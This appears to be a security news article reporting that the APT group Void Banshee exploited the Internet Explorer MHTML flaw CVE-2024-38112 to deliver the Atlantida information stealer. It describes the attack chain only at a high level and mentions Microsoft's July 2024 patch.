Hackers target legitimate Remote Monitoring and Management (RMM) tools as they provide powerful, trusted access to systems and networks.
This can facilitate the widespread and efficient deployment of malware across an organization’s infrastructure.
Cybersecurity researchers at CheckPoint recently discovered that hackers have been actively attacking Windows users with Internet Explorer zero-day vulnerability.
Trend Micro discovered CVE-2024-38112, an MHTML remote code execution vulnerability exploited by APT group Void Banshee.
Internet Explorer Zero-Day Vulnerability
The attack chain abuses internet shortcuts and Microsoft protocol handlers, including MHTML, to access disabled Internet Explorer and execute malicious code.
Are you from SOC/DFIR Teams? - Sign up for a free ANY.RUN account! to Analyse Advanced Malware Files
This vulnerability is used to deliver the Atlantida stealer, active since January 2024, targeting North America, Europe, and Southeast Asia for information theft and financial gain.
.webp)
Despite Internet Explorer’s (IE) official end of support and disabling, its leftovers persist in modern Windows systems.
Void Banshee exploited CVE-2024-38112, a vulnerability similar to CVE-2021-40444, using specially crafted URL files with MHTML protocol handlers and x-usc directives to access and run HTA files through the disabled IE process.
This method bypasses IE’s discontinuation, exploiting its historically large attack surface. Microsoft patched this vulnerability in July 2024 by unregistering the MHTML handler from IE, reads the report.
Void Banshee exploited CVE-2024-38112 by planting a malicious URL file that had been disguised as a PDF to executive professionals and students.
.webp)
To access disabled Internet Explorer, an HTA file is downloaded, VBScript is executed, and MHTML protocol handlers and x-usc directives are utilized in the attack chain.
This culminates in invoking LoadToBadXml, a .NET Trojan loader, which then injects the Atlantida stealer into RegAsm.exe.
.webp)
The open-source stealers-based Atlantida’s substantial collection includes gathering extensive confidential data from various applications, browsers, and system locations by compressing it and transmitting it through TCP to the attacker.
The malware packs all collected data into a ZIP file and then tunnels it over TCP port 6655 to the attacker’s C&C server.
Despite Internet Explorer being disabled, attackers exploit its remaining presence to install ransomware and other dangerous software.
Void Banshee is an example of an APT group that uses unpatched services to highlight a major security concern.
Rapid response time combined with complex security solutions is highly recommended for breach resolution and systems safeguarding.
“Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!”- Free Demo